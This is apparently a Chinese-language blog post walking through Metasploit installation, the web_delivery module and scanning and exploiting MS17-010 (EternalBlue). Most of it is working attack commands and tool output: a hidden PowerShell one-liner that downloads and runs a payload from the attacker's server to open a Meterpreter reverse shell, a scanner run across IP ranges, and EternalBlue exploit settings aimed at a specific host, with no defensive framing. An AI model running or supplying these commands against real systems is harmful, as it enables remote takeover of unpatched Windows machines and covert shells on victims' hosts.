MSF17-010检测扫描/WEB-DELIVERY

MSF 介绍

Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具

metasploit安装

最好使用这种方法安装,安装后自己安装portsql,可以使用fast serach进行漏洞查询
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall chmod 755 msfinstall
./msfinstall MSF web_delivery

msf > use exploit/multi/script/web_delivery  
- 设置目标是什么系统,好升生成不同的PHP/PYTHON/POWERSHELL
msf exploit(web_delivery) > set target 2  
target => 2  
- 生成反弹payload
msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp  
payload => windows/meterpreter/reverse_tcp  
- 在服务器上开启要被访问的URL
msf exploit(web_delivery) > set SRVPORT 8081  
SRVPORT => 8081  
msf exploit(web_delivery) > set URIPATH /  
URIPATH => /  
msf exploit(web_delivery) > set lhost ip  #外网ip地址  
lhost => ip  
- 开启反弹shell的连接iP和端口
msf exploit(web_delivery) > set lport 6666  
lport => 6666  
msf exploit(web_delivery) > run  
[*] Exploit running as background job.
[*] Started reverse TCP handler on 192.168.2.100:6666
msf exploit(web_delivery) > [*] Using URL: http://0.0.0.0:8081/  
[*] Local IP: http://192.168.2.100:8081/
[*] Server started.
##生成的shell,如下生成的是powershell
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $k=new-object net.webclient;$k.proxy=[Net.WebRequest]::GetSystemWebProxy();$k.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $k.downloadstring('http://外网ip:8081/');  
MS17-010扫描/攻击

扫描模块MS17-010可以检查出那些机器存在漏洞,哪些已被注入DoublePulsar(感染)
[+] 172.20.64.176:445 - Host is likely VULNERABLE to MS17-010! (Windows Server 2008 R2 Enterprise 7601 Service Pack 1) [!] 172.20.64.176:445 - Host is likely INFECTED with DoublePulsar! - Arch: x64 (64-bit), XOR Key: 0x32752EAF use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 1.1.1.1 - 1.1.1.100
set threads 100
run​

入侵模块可以直接设置一个返回的meterpreter的sessions提供我们使用,目前我这边测试好像对于win2003系统成功率比较低
msf > use exploit/windows/smb/ms17_010_eternalblue  
msf exploit(ms17_010_eternalblue) > set rhost 172.20.64.176  
msf exploit(ms17_010_eternalblue) > options  
msf exploit(ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp  
msf exploit(ms17_010_eternalblue) > set lhost 本机ip  
msf exploit(ms17_010_eternalblue) > set lport 本机监听port  
msf exploit(ms17_010_eternalblue) > run -j  
Module options (exploit/windows/smb/ms17_010_eternalblue):  
   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   GroomAllocations    12               yes       Initial number of times to groom the kernel pool.
   GroomDelta          5                yes       The amount to increase the groom count by per try.
   MaxExploitAttempts  3                yes       The number of times to retry the exploit.
   ProcessName         spoolsv.exe      yes       Process to inject payload into.
   RHOST                                yes       The target address
   RPORT               445              yes       The target port (TCP)
   SMBDomain           .                no        (Optional) The Windows domain to use for authentication
   SMBPass                              no        (Optional) The password for the specified username
   SMBUser                              no        (Optional) The username to authenticate as
   VerifyArch          true             yes       Check if remote architecture matches exploit Target.
   VerifyTarget        true             yes       Check if remote OS matches exploit Target.
Payload options (windows/x64/meterpreter/reverse_tcp):  
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: , seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     6666             yes       The listen port

Exploit target:  
   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


感谢一哥

郝先生

继续阅读此作者的更多文章